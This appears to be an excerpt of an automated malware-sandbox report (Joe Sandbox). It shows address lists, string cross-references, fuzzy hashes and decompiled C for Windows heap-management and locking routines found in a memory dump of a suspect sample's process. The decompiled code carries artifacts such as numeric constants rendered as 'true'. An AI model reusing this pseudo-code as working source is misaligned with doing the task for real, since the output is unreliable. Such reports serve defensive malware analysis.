0x36b736b3
0x36b736c2
0x36b736f4
0x36b736c4
0x36b736c4
0x36b736c9
0x36b736d0
0x36b736e2
0x36b736d2
0x36b736db
0x36b736db
0x36b736ed
0x36b736ed
0x36b736fb
0x36b73be3
0x00000000
0x36b7370a
0x36b73715
0x36b73723
0x36b7372a
0x36b73745
0x36b7374c
0x36b7375e
0x36b73772
0x36b7377e
0x36b737b1
0x36b737c5
0x36b737cc
0x36b737dc
0x00000000
0x36b737de
0x36b737ea
0x36b73862
0x00000000
0x36b73886
0x36b7388d
0x00000000
0x36b73897
0x36b73897
0x36b738a1
0x00000000
0x36b738b5
0x36b738b5
0x00000000
0x36b738b5
0x36b738a1
0x36b7388d
0x36b737ec
0x36b737ef
0x36b737f9
0x36b73820
0x36b73832
0x00000000
0x36b73834
0x36b73834
0x36b7383e
0x00000000
0x36b7384e
0x36b7384e
0x36b738bb
0x36b738bd
0x36b738c9
0x36b738d3
0x36b738ea
0x36b738fd
0x36b7390f
0x36b73914
0x36b7391a
0x36b73922
0x36b73932
0x36b73950
0x36b73952
0x36b7395a
0x36b7399d
0x36b7399d
0x00000000
0x36b7395c
0x36b7395c
0x36b7395e
0x36b73964
0x36b73966
0x36b7396f
0x36b73971
0x36b73980
0x36b73983
0x36b73986
0x00000000
0x00000000
0x00000000
0x36b73986
0x36b73988
0x36b73988
0x36b73990
0x36b739f0
0x36b739f2
0x00000000
0x36b739f4
0x36b739f6
0x36b73a03
0x36b73a05
0x36b73a0d
0x00000000
0x36b73a0f
0x36b73a13
0x36b73a73
0x36b73a75
0x36b73ab9
0x36b73ac2
0x36b73ac4
0x36b73acc
0x00000000
0x36b73ad2
0x36b73ad2
0x36b73ada
0x00000000
0x36b73ae0
0x36b73ae0
0x36b73ae7
0x36b73aec
0x36b73af8
0x36b73b03
0x36b73b1d
0x36b73b1f
0x36b73b27
0x00000000
0x36b73b29
0x36b73b29
0x36b73b2f
0x36b73b32
0x36b73b32
0x36b73b35
0x36b73b38
0x36b73b3f
0x36b73b41
0x00000000
0x36b73b41
0x36b73aee
0x36b73aee
0x36b73b47
0x36b73b47
0x36b73b4c
0x36b73b8f
0x36b73b92
0x36b73b94
0x36b73b99
0x36b73b9f
0x36b73ba6
0x36b73ba6
0x00000000
0x36b73b4e
0x36b73b4e
0x36b73b56
0x00000000
0x36b73b58
0x36b73b58
0x36b73b64
0x36b73b75
0x36b73b7f
0x36b73b83
0x00000000
0x36b73b83
0x36b73b56
0x36b73b4c
0x36b73aec
0x36b73ada
0x36b73a15
0x36b73a17
0x36b73a24
0x36b73a28
0x36b73a31
0x36b73a5a
0x36b73a5c
0x36b73a64
0x00000000
0x00000000
0x00000000
0x00000000
0x36b73a33
0x36b73a36
0x36b73a3f
0x00000000
0x36b73a3f
0x36b73a31
0x36b73a13
0x36b73a0d
0x00000000
0x36b73992
0x36b73992
0x36b73992
0x36b73997
0x00000000
0x36b73997
0x36b73990
0x36b73924
0x36b73924
0x36b73929
0x36b739a3
0x36b739a3
0x36b739a3
0x36b738ff
0x36b738ff
0x00000000
0x36b738ff
0x36b738d5
0x36b738d5
0x36b738d5
0x36b738da
0x36b738e0
0x36b738e0
0x36b739a5
0x36b739a5
0x00000000
0x36b738bf
0x36b738bf
0x36b738bf
0x36b738bd
0x36b7383e
0x36b73822
0x36b73822
0x36b73822
0x00000000
0x36b73822
0x00000000
0x00000000
0x00000000
0x36b737f9
0x36b737ea
0x36b737dc
0x36b73780
0x36b73795
0x00000000
0x36b7379f
0x36b7379f
0x36b737a7
0x00000000
0x00000000
0x00000000
0x00000000
0x36b737a7
0x36b73795
0x36b73760
0x36b73760
0x36b73760
0x36b73765
0x36b73765
0x36b7376b
0x36b739aa
0x36b739ac
0x36b739b9
0x36b739be
0x36b739be
0x36b739cb
0x36b73bed
0x36b739d1
0x36b739da
0x36b739df
0x36b739df
0x36b73bf5
0x36b73bfe
0x36b73c09
0x36b73c0f
0x36b73c0f
0x36b73c1e
0x36b73c1e
0x36b73c23
0x36b73c23
0x36b7375e
0x36b7374c
0x36b7372a
0x36b73c25
0x36b73c28
0x36b73c34

Strings

LdrpResSearchResourceHandle Exit, xrefs: 36B73681
LdrpResSearchResourceHandle Enter, xrefs: 36B73666
PE, xrefs: 36B737D2

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 0ae9154866cd5a9c465eac3fa544c60c0276885d7d45f77d82f22395c6f29575
Instruction ID: 1ffa09fdbf586b1f8a978252cbb2bddfc51beb27b520dfb86a002204b0d36574
Opcode Fuzzy Hash: 0ae9154866cd5a9c465eac3fa544c60c0276885d7d45f77d82f22395c6f29575
Instruction Fuzzy Hash: 42F16EB5E002388BDB20CF19CC90BD9B3B5EF44744F5550E9EA19A7241EB319E85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 36AE1380 Relevance: 4.1, Strings: 3, Instructions: 385
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E36AE1380(signed int __ecx, unsigned int __edx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t167;
				signed int _t176;
				signed short _t181;
				intOrPtr _t182;
				signed int _t184;
				signed int _t185;
				signed int _t189;
				intOrPtr _t192;
				signed int _t193;
				char _t195;
				signed int _t198;
				signed int _t204;
				void* _t208;
				signed int _t209;
				signed int _t211;
				short _t218;
				intOrPtr _t219;
				signed short _t226;
				signed short _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				intOrPtr _t236;
				intOrPtr _t246;
				signed int _t250;
				signed int _t253;
				signed int _t260;
				signed int _t262;
				void* _t264;
				intOrPtr* _t265;
				signed char _t267;
				signed char _t268;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t287;
				void* _t288;
				unsigned int _t296;
				void* _t299;
				signed int _t303;
				signed short _t306;
				signed short* _t307;
				signed int _t309;
				char _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				void* _t317;
				signed char _t318;
				signed short* _t327;
				signed int _t329;
				signed int _t330;
				signed short* _t331;
				signed int _t333;

				_t167 = _a12;
				_t260 = __ecx;
				_v24 = __edx;
				_t331 = _a4;
				_v12 = _t167;
				if(_t167 >  *((intOrPtr*)(__ecx + 0x5c))) {
					L7:
					return 0;
				}
				_v5 = _t331[1];
				_t327 = _t331 + ( *_t331 & 0x0000ffff) * 8;
				if((( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t327[1]) & 0x00000001) != 0) {
					goto L7;
				}
				if( *(__ecx + 0x4c) != 0) {
					 *_t327 =  *_t327 ^  *(__ecx + 0x50);
					if(_t327[1] != (_t327[0] ^ _t327[1] ^  *_t327)) {
						_push(__ecx);
						E36B9D646(__ecx, __ecx, _t327, _t327, _t331, __eflags);
					}
				}
				_t262 =  *_t327 & 0x0000ffff;
				_t176 = ( *_t331 & 0x0000ffff) + _t262;
				_v28 = _t176;
				if(_t176 < _v12) {
					__eflags =  *(_t260 + 0x4c);
					if( *(_t260 + 0x4c) != 0) {
						_t327[1] = _t327[0] ^ _t327[1] ^  *_t327;
						 *_t327 =  *_t327 ^  *(_t260 + 0x50);
					}
					goto L7;
				}
				_t181 = _t327[4];
				_t306 = _t327[6];
				_v20 = _t181;
				_v16 = _t306;
				_t182 =  *((intOrPtr*)(_t181 + 4));
				_t307 =  &(_t327[4]);
				if( *_t306 == _t182) {
					__eflags =  *_v16 - _t307;
					_t333 = _a4;
					if( *_v16 != _t307) {
						goto L6;
					}
					 *((intOrPtr*)(_t260 + 0x74)) =  *((intOrPtr*)(_t260 + 0x74)) - _t262;
					_t309 =  *(_t260 + 0xb4);
					__eflags = _t309;
					if(_t309 == 0) {
						L17:
						_t265 = _v16;
						_t184 = _v20;
						 *_t265 = _t184;
						 *((intOrPtr*)(_t184 + 4)) = _t265;
						__eflags = _t327[1] & 0x00000008;
						if((_t327[1] & 0x00000008) != 0) {
							_t185 = E36ADF5C7(_t260, _t327);
							__eflags = _t185;
							if(_t185 != 0) {
								goto L18;
							}
							E36ADF113(_t260, _t327,  *_t327 & 0x0000ffff, "true");
							goto L7;
						}
						L18:
						_t267 = _t327[1];
						_t311 = 0;
						__eflags = _t267 & 0x00000004;
						if((_t267 & 0x00000004) == 0) {
							L24:
							_t268 =  *((intOrPtr*)(_t333 + 7));
							_t329 = ( *_t333 & 0x0000ffff) << 3;
							_v20 = _t327[1];
							__eflags = _t268 - 5;
							if(_t268 == 5) {
								_t270 =  *(_t260 + 0x54) & 0x0000ffff ^  *(_t333 + 4) & 0x0000ffff;
							} else {
								__eflags = _t268 & 0x00000040;
								if((_t268 & 0x00000040) != 0) {
									_t270 =  *(_t333 + 4 + (_t268 & 0x3f) * 8) & 0x0000ffff;
								} else {
									__eflags = (_t268 & 0x0000003f) - 0x3f;
									if((_t268 & 0x0000003f) == 0x3f) {
										__eflags = _t268;
										if(_t268 >= 0) {
											__eflags =  *(_t260 + 0x4c) - _t311;
											if( *(_t260 + 0x4c) == _t311) {
												_t226 =  *_t333 & 0x0000ffff;
											} else {
												_t229 =  *_t333;
												__eflags =  *(_t260 + 0x4c) & _t229;
												if(( *(_t260 + 0x4c) & _t229) != 0) {
													_t229 = _t229 ^  *(_t260 + 0x50);
													__eflags = _t229;
												}
												_t226 = _t229 & 0x0000ffff;
											}
										} else {
											_t296 = _t333 >> 0x00000003 ^  *_t333 ^  *0x36bd6964 ^ _t260;
											__eflags = _t296;
											if(_t296 == 0) {
												_t231 = _t333 - (_t296 >> 0xd);
												__eflags = _t231;
												_t311 =  *_t231;
											}
											_t226 =  *((intOrPtr*)(_t311 + 0x14));
										}
										_t270 =  *(_t333 + (_t226 & 0xffff) * 8 - 4);
									} else {
										_t270 = _t268 & 0x3f;
										__eflags = _t270;
									}
								}
							}
							_t312 = _v12;
							_t330 = _t329 - _t270;
							_t271 = _v28;
							_t189 = _t271 - _t312;
							__eflags = _t189 - 2;
							if(_t189 <= 2) {
								_t312 = _t271;
								_v12 = _t312;
							}
							_t272 = 2;
							__eflags = _t272 - _t189;
							asm("sbb ecx, ecx");
							__eflags = _v5 & 0x00000002;
							_v16 = _t272 & _t189;
							if((_v5 & 0x00000002) != 0) {
								_t274 =  *_t333 & 0x0000ffff;
								 *((intOrPtr*)(_t333 + _t312 * 8 - 8)) =  *((intOrPtr*)(_t333 + _t274 * 8 - 8));
								 *((intOrPtr*)(_t333 + _t312 * 8 - 4)) =  *((intOrPtr*)(_t333 + _t274 * 8 - 4));
								_t192 =  *[fs:0x30];
								__eflags =  *(_t192 + 0x68) & 0x00000800;
								if(( *(_t192 + 0x68) & 0x00000800) == 0) {
									goto L31;
								}
								_t218 = E36B89AFE(_t260,  *((intOrPtr*)(_t333 + _t312 * 8 - 6)),  *_t333 & 0x0000ffff, _t312, "true");
								_t313 = _v12;
								 *((short*)(_t333 + _t313 * 8 - 6)) = _t218;
								goto L32;
							} else {
								_t219 =  *[fs:0x30];
								__eflags =  *(_t219 + 0x68) & 0x00000800;
								if(( *(_t219 + 0x68) & 0x00000800) != 0) {
									 *(_t333 + 3) = E36B89AFE(_t260,  *(_t333 + 3) & 0x000000ff,  *_t333 & 0x0000ffff, _t312, "true");
								}
								L31:
								_t313 = _v12;
								L32:
								_t193 = _t313 & 0x0000ffff;
								_t276 = _t313 << 3;
								_v12 = _t193;
								 *_t333 = _t193;
								_t195 = _t276 - _a8;
								__eflags = _v16;
								if(_v16 == 0) {
									 *(_t333 + 2) =  *(_t333 + 2) | _v20;
									__eflags = _t195 - 0x3f;
									if(_t195 >= 0x3f) {
										 *((intOrPtr*)(_t276 + _t333 - 4)) = _t195;
										 *((char*)(_t333 + 7)) = 0x3f;
									} else {
										 *((char*)(_t333 + 7)) = _t195;
									}
									 *(_t333 + 4 + ( *_t333 & 0x0000ffff) * 8) =  *(_t260 + 0x54) ^  *_t333 & 0x0000ffff;
								} else {
									_t288 = _t276 + _t333;
									__eflags = _t195 - 0x3f;
									if(_t195 >= 0x3f) {
										 *((intOrPtr*)(_t288 - 4)) = _t195;
										 *((char*)(_t333 + 7)) = 0x3f;
									} else {
										 *((char*)(_t333 + 7)) = _t195;
									}
									_t318 =  *((intOrPtr*)(_t333 + 6));
									_t211 =  *(_t260 + 0x40) & 0x00000040;
									_v28 = _t211;
									__eflags = _t318;
									if(_t318 == 0) {
										_t319 = _t260;
									} else {
										_t211 = _v28;
										_t319 = (_t333 & 0xffff0000) - ((_t318 & 0x000000ff) << 0x10) + 0x10000;
										__eflags = (_t333 & 0xffff0000) - ((_t318 & 0x000000ff) << 0x10) + 0x10000;
									}
									_t211 = _t211 != 0;
									L36AE170C(_t260, _t319, _t288, _v20, (_t211 & 0xffffff00 | _t211 != 0x00000000) & 0x000000ff, _v12, _v16);
								}
								__eflags = _v24 & 0x00000008;
								_t315 = _a8;
								if((_v24 & 0x00000008) != 0) {
									__eflags = _t315 - _t330;
									if(_t315 < _t330) {
										_t330 = _t315;
									}
									L36ADEACC(_t260, _t333 + 8, _t330);
									goto L40;
								} else {
									__eflags =  *(_t260 + 0x40) & 0x00000040;
									if(( *(_t260 + 0x40) & 0x00000040) != 0) {
										_t287 = _t330 & 0x00000003;
										__eflags = _t287;
										if(_t287 != 0) {
											_push("true");
											_pop(_t208);
											_t209 = _t208 - _t287;
											__eflags = _t209;
											_t287 = _t209;
										}
										_t198 = _a8;
										_t317 = _t287 + _t330;
										__eflags = _t198 - _t317;
										if(_t198 <= _t317) {
											L41:
											__eflags =  *(_t260 + 0x40) & 0x00000020;
											if(( *(_t260 + 0x40) & 0x00000020) != 0) {
												 *((intOrPtr*)(_t333 + _t198 + 8)) = 0xabababab;
												 *((intOrPtr*)(_t333 + _t198 + 0xc)) = 0xabababab;
											}
											 *(_t333 + 2) = (_v24 >> 0x00000004 ^  *(_t333 + 2)) & 0x0000001f ^ _v24 >> 0x00000004;
											return 1;
										} else {
											_t204 = _t198 - _t287 - _t330 & 0xfffffffc;
											__eflags = _t204;
											if(_t204 != 0) {
												E36B38140(_t333 + 8 + _t317, _t204, 0xbaadf00d);
											}
											goto L40;
										}
									}
									L40:
									_t198 = _a8;
									goto L41;
								}
							}
						}
						_t233 = ( *_t327 & 0x0000ffff) * 8 - 0x10;
						_v16 = _t233;
						__eflags = _t267 & 0x00000002;
						if((_t267 & 0x00000002) != 0) {
							_push("true");
							_pop(_t299);
							__eflags = _t233 - _t299;
							if(_t233 > _t299) {
								_v16 = _t233;
							}
						}
						_t235 = E36B380A0( &(_t327[8]), _t233, 0xfeeefeee);
						_v20 = _t235;
						__eflags = _t235 - _v16;
						if(_t235 == _v16) {
							L23:
							_t311 = 0;
							__eflags = 0;
							goto L24;
						} else {
							_t236 =  *[fs:0x30];
							__eflags =  *(_t236 + 0xc);
							if( *(_t236 + 0xc) != 0) {
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c;
								E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							} else {
								_push("HEAP: ");
								E36ADB910();
							}
							_push(_v20 + 0x10 + _t327);
							E36ADB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t327);
							_t246 =  *[fs:0x30];
							__eflags =  *((char*)(_t246 + 2));
							if( *((char*)(_t246 + 2)) == 0) {
								goto L23;
							} else {
								 *0x36bd47a1 = 1;
								asm("int3");
								_t311 = 0;
								 *0x36bd47a1 = 0;
								goto L24;
							}
						}
					} else {
						_t303 =  *_t327 & 0x0000ffff;
						while(1) {
							__eflags = _t303 -  *((intOrPtr*)(_t309 + 4));
							if(_t303 <  *((intOrPtr*)(_t309 + 4))) {
								_t250 = _t303;
								break;
							}
							_t253 =  *_t309;
							__eflags = _t253;
							if(_t253 == 0) {
								_t250 =  *((intOrPtr*)(_t309 + 4)) - 1;
								break;
							} else {
								_t309 = _t253;
								continue;
							}
						}
						E36AF036A(_t260, _t309, "true",  &(_t327[4]), _t250, _t303);
						goto L17;
					}
				}
				L6:
				_push(0);
				_push( *_v16);
				_push(_t182);
				_push(_t307);
				_t264 = 0xd;
				E36BA5FED(_t264, _t260);
				goto L7;
			}

0x36ae1388
0x36ae138c
0x36ae138e
0x36ae1392
0x36ae1396
0x36ae139c
0x36ae1413
0x00000000
0x36ae1413
0x36ae13a1
0x36ae13a7
0x36ae13b8
0x00000000
0x00000000
0x36ae13be
0x36ae13c3
0x36ae13d0
0x36b3f4c9
0x36b3f4cc
0x36b3f4cc
0x36ae13d0
0x36ae13d6
0x36ae13dc
0x36ae13de
0x36ae13e4
0x36ae1603
0x36ae1607
0x36ae1615
0x36ae161b
0x36ae161b
0x00000000
0x36ae1607
0x36ae13ea
0x36ae13ed
0x36ae13f0
0x36ae13f3
0x36ae13f6
0x36ae13fb
0x36ae13fe
0x36ae141f
0x36ae1421
0x36ae1424
0x00000000
0x00000000
0x36ae1426
0x36ae1429
0x36ae142f
0x36ae1431
0x36ae145a
0x36ae145a
0x36ae145d
0x36ae1460
0x36ae1462
0x36ae1465
0x36ae1469
0x36ae167e
0x36ae1683
0x36ae1685
0x00000000
0x00000000
0x36b3f4e0
0x00000000
0x36b3f4e0
0x36ae146f
0x36ae146f
0x36ae1472
0x36ae1474
0x36ae1477
0x36ae14c7
0x36ae14cd
0x36ae14d0
0x36ae14d3
0x36ae14d6
0x36ae14d9
0x36b3f4f2
0x36ae14df
0x36ae14df
0x36ae14e2
0x36b3f4ff
0x36ae14e8
0x36ae14ec
0x36ae14ee
0x36b3f509
0x36b3f50b
0x36b3f530
0x36b3f533
0x36b3f544
0x36b3f535
0x36b3f535
0x36b3f537
0x36b3f53a
0x36b3f53c
0x36b3f53c
0x36b3f53c
0x36b3f53f
0x36b3f53f
0x36b3f50d
0x36b3f51a
0x36b3f51c
0x36b3f51f
0x36b3f526
0x36b3f526
0x36b3f528
0x36b3f528
0x36b3f52a
0x36b3f52a
0x36b3f54d
0x36ae14f4
0x36ae14f7
0x36ae14f7
0x36ae14f7
0x36ae14ee
0x36ae14e2
0x36ae14fa
0x36ae14fd
0x36ae14ff
0x36ae1504
0x36ae1506
0x36ae1509
0x36ae16a4
0x36ae16a6
0x36ae16a6
0x36ae1511
0x36ae1512
0x36ae1514
0x36ae1518
0x36ae151c
0x36ae151f
0x36ae16dd
0x36ae16e4
0x36ae16ec
0x36ae16f0
0x36ae16f6
0x36ae16fd
0x00000000
0x00000000
0x36b3f564
0x36b3f569
0x36b3f56c
0x00000000
0x36ae1525
0x36ae1525
0x36ae152b
0x36ae1532
0x36b3f588
0x36b3f588
0x36ae1538
0x36ae1538
0x36ae153b
0x36ae153b
0x36ae1540
0x36ae1543
0x36ae1546
0x36ae154b
0x36ae154e
0x36ae1552
0x36ae16b1
0x36ae16b4
0x36ae16b7
0x36b3f590
0x36b3f594
0x36ae16bd
0x36ae16bd
0x36ae16bd
0x36ae16ca
0x36ae1558
0x36ae1558
0x36ae155a
0x36ae155d
0x36b3f59d
0x36b3f5a0
0x36ae1563
0x36ae1563
0x36ae1563
0x36ae1569
0x36ae156c
0x36ae156f
0x36ae1572
0x36ae1574
0x36ae15ea
0x36ae1576
0x36ae1586
0x36ae1589
0x36ae1589
0x36ae1589
0x36ae1597
0x36ae15a4
0x36ae15a4
0x36ae15a9
0x36ae15ad
0x36ae15b0
0x36ae1690
0x36ae1692
0x36ae1708
0x36ae1708
0x36ae169a
0x00000000
0x36ae15b6
0x36ae15b6
0x36ae15ba
0x36b3f5ab
0x36b3f5ab
0x36b3f5ae
0x36b3f5b0
0x36b3f5b2
0x36b3f5b3
0x36b3f5b3
0x36b3f5b5
0x36b3f5b5
0x36b3f5b7
0x36b3f5ba
0x36b3f5bd
0x36b3f5bf
0x36ae15c3
0x36ae15c3
0x36ae15c7
0x36b3f5ed
0x36b3f5f1
0x36b3f5f1
0x36ae15e2
0x00000000
0x36b3f5c5
0x36b3f5c9
0x36b3f5c9
0x36b3f5cc
0x36b3f5de
0x36b3f5de
0x00000000
0x36b3f5cc
0x36b3f5bf
0x36ae15c0
0x36ae15c0
0x00000000
0x36ae15c0
0x36ae15b0
0x36ae151f
0x36ae147c
0x36ae1483
0x36ae1486
0x36ae1489
0x36ae15ee
0x36ae15f0
0x36ae15f1
0x36ae15f3
0x36ae15fb
0x36ae15fb
0x36ae15f3
0x36ae1499
0x36ae149e
0x36ae14a1
0x36ae14a4
0x36ae14c5
0x36ae14c5
0x36ae14c5
0x00000000
0x36ae14a6
0x36ae14a6
0x36ae14ac
0x36ae14b0
0x36ae162e
0x36ae1637
0x36ae14b6
0x36ae14b6
0x36ae14bb
0x36ae14bb
0x36ae1646
0x36ae164d
0x36ae1652
0x36ae165b
0x36ae165f
0x00000000
0x36ae1665
0x36ae1665
0x36ae166c
0x36ae166d
0x36ae166f
0x00000000
0x36ae166f
0x36ae165f
0x36ae1433
0x36ae1433
0x36ae1436
0x36ae1436
0x36ae1439
0x36ae1449
0x36ae1449
0x36ae1449
0x36ae143b
0x36ae143d
0x36ae143f
0x36ae16d7
0x00000000
0x36ae1445
0x36ae1445
0x00000000
0x36ae1445
0x36ae143f
0x36ae1455
0x00000000
0x36ae1455
0x36ae1431
0x36ae1400
0x36ae1403
0x36ae1405
0x36ae1407
0x36ae1408
0x36ae140d
0x36ae140e
0x00000000

Strings

HEAP[%wZ]: , xrefs: 36AE1632
HEAP: , xrefs: 36AE14B6
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36AE1648

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: fead1f0421ee5d043213c6b2c1870d4e43eb832bcac60e369beb3b74cd7cb9da
Instruction ID: d30a6c5bccf3ccc6c64d44abf7d7351a077086f622052f20dcc003f6f305be59
Opcode Fuzzy Hash: fead1f0421ee5d043213c6b2c1870d4e43eb832bcac60e369beb3b74cd7cb9da
Instruction Fuzzy Hash: 55E1E1B4A043659BEB14CF29C850BBAFBF5EF48308F24885EE996CB245E734D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 36B0F4D0 Relevance: 4.1, Strings: 3, Instructions: 382
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E36B0F4D0(signed int __ecx, signed char __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char _v72;
				signed int _v76;
				char _v80;
				void* _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				void* _v100;
				signed int _v104;
				char _v108;
				signed char _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				char _v129;
				char _v130;
				intOrPtr _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				signed int _t132;
				signed int _t134;
				signed char* _t138;
				signed char* _t139;
				signed char* _t140;
				void* _t142;
				signed int _t144;
				signed int _t145;
				void* _t152;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t191;
				signed char* _t192;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t206;
				unsigned int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				intOrPtr _t218;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				intOrPtr _t229;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				intOrPtr _t238;
				signed char _t241;
				void* _t244;
				signed int _t246;
				intOrPtr _t247;
				void* _t251;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t234 = __edx;
				_t209 = __ecx;
				_t254 = (_t252 & 0xfffffff8) - 0x84;
				_v8 =  *0x36bdb370 ^ _t254;
				_t129 =  *[fs:0x18];
				_t241 = __ecx;
				_v112 = __edx;
				_v72 = __ecx;
				_v129 = 0;
				_v64 = _t129;
				_v108 = 0;
				if(__ecx == 0x36bd3390) {
					_v129 = 1;
					 *((intOrPtr*)(_t129 + 0xf84)) = 1;
				}
				if( *0x36bd5da8 != 0) {
					_push(0xc000004b);
					_push(0xffffffff);
					E36B22C70();
				}
				if( *0x36bd5a84 == 0) {
					_v120 = 0x36bd5a88;
				} else {
					_v120 = 0;
				}
				_t246 = _t241 + 0x10;
				if( *(_t241 + 0x10) == 0) {
					_t210 = _t209 | 0xffffffff;
					__eflags =  *0x36bd4ae2;
					_v124 = _t210;
					if( *0x36bd4ae2 != 0) {
						_push(0);
						_push("true");
						_push(0);
						_push(0x100003);
						_push( &_v124);
						_t132 = E36B22E30();
						__eflags = _t132;
						if(_t132 >= 0) {
							_t211 = _v124;
						} else {
							_t211 = _t210 | 0xffffffff;
							_v124 = _t210 | 0xffffffff;
						}
					}
					asm("lock cmpxchg [esi], ecx");
					__eflags = 0;
					if(0 != 0) {
						_t198 = _v124;
						__eflags = _t198 - 0xffffffff;
						if(_t198 != 0xffffffff) {
							_push(_t198);
							E36B22A80();
						}
					}
				}
				_t134 =  *_t241;
				if(_t134 == 0xffffffff) {
					_t134 = _t134 | 0xffffffff;
					__eflags =  *(_t241 + 0x14) & 0x01000000;
					if(( *(_t241 + 0x14) & 0x01000000) == 0) {
						_t211 = _t241;
						E36B0FCE0(_t241, _t234);
						_t134 =  *_t241;
					}
				}
				_v104 = 0;
				if(_t134 != 0xffffffff) {
					 *((intOrPtr*)(_t134 + 0x14)) =  *((intOrPtr*)(_t134 + 0x14)) + 1;
				}
				_t201 =  *_t246;
				_v68 = _t201;
				L9:
				while(1) {
					L9:
					if(E36AF3C40() != 0) {
						_t138 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t138 = 0x7ffe0382;
					}
					if( *_t138 != 0) {
						_t139 =  *[fs:0x30];
						__eflags = _t139[0x240] & 0x00000002;
						if((_t139[0x240] & 0x00000002) != 0) {
							_v16 = _t241;
							_v54 = 0x1722;
							_v24 =  *(_t241 + 0x14) & 0x00ffffff;
							_v28 =  *(_t241 + 4);
							_v20 =  *((intOrPtr*)(_t241 + 0xc));
							_t191 = ( *[fs:0x30])[0x50];
							__eflags = _t191;
							if(_t191 == 0) {
								L61:
								_t192 = 0x7ffe0382;
							} else {
								__eflags =  *_t191;
								if( *_t191 == 0) {
									goto L61;
								} else {
									_t192 = ( *[fs:0x30])[0x50] + 0x228;
								}
							}
							_t211 =  &_v60;
							_push( &_v60);
							_push("true");
							_push(0x20402);
							_push( *_t192 & 0x000000ff);
							E36B22F90();
						}
						goto L12;
						L24:
						if(_t140 < 0) {
							E36B38AA0(_t211, _t234, _t140);
							asm("int3");
							__eflags = _t246 != 4;
							if(_t246 != 4) {
								L47:
								E36B0F946(_v132,  &_v124);
								_t152 = 0;
							} else {
								_t124 = _t241 + 4; // 0x74db85f0
								_t238 =  *_t124;
								_t153 =  *_t241;
								asm("lock cmpxchg8b [esi]");
								__eflags = _t153 -  *_t241;
								if(_t153 !=  *_t241) {
									goto L47;
								} else {
									_t126 = _t241 + 4; // 0x74db85f0
									__eflags = _t238 -  *_t126;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t152 = L36B0F8A5(_v132,  &_v124, _a8, _a12);
									}
								}
							}
							return _t152;
						} else {
							if(_v129 != 0) {
								 *((intOrPtr*)(_v64 + 0xf84)) = 0;
								_t156 = ( *[fs:0x30])[0x50];
								__eflags = _t156;
								if(_t156 == 0) {
									L81:
									_t140 = 0x7ffe0384;
								} else {
									__eflags =  *_t156;
									if( *_t156 == 0) {
										goto L81;
									} else {
										_t140 = ( *[fs:0x30])[0x50] + 0x22a;
									}
								}
								__eflags =  *_t140;
								if( *_t140 != 0) {
									_t140 =  *[fs:0x30];
									__eflags = _t140[0x240] & 0x00000004;
									if((_t140[0x240] & 0x00000004) != 0) {
										_t159 = ( *[fs:0x30])[0x50];
										__eflags = _t159;
										if(_t159 == 0) {
											L87:
											_t140 = 0x7ffe0385;
										} else {
											__eflags =  *_t159;
											if( *_t159 == 0) {
												goto L87;
											} else {
												_t140 = ( *[fs:0x30])[0x50] + 0x22b;
											}
										}
										__eflags =  *_t140 & 0x00000020;
										if(( *_t140 & 0x00000020) != 0) {
											_t140 = E36B60227(0x1483, _t234, 0xffffffff, 0xffffffff, 0, 0);
										}
									}
								}
							}
							_pop(_t244);
							_pop(_t251);
							_pop(_t206);
